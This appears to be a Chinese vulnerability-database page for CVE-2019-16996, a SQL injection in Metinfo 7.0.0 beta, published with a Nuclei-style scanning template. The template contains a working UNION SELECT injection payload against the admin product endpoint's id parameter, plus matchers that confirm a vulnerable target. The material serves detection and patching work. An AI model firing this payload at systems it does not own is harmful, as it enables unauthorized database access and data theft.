CVE-2019-16996: Metinfo 7.0.0 beta - SQL Injection

日期: 2025-08-01 | 影响软件: Metinfo | POC: 已公开

漏洞描述

Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter.

PoC代码[已公开]

id: CVE-2019-16996

info:
  name: Metinfo 7.0.0 beta - SQL Injection
  author: ritikchaddha
  severity: high
  description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability.
  reference:
    - https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16996
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/StarCrossPortal/scalpel
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2019-16996
    cwe-id: CWE-89
    epss-score: 0.92323
    epss-percentile: 0.99715
    cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: metinfo
    product: metinfo
  tags: cve2019,cve,metinfo,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "1918835981"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220499aeb2220f74fc2529362c67735ae6849c98eb04d69780178e18dcad354011e022100829a0f98d6fae60e2aa176450dff2e8af380b6452f3049415efea043083a649b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐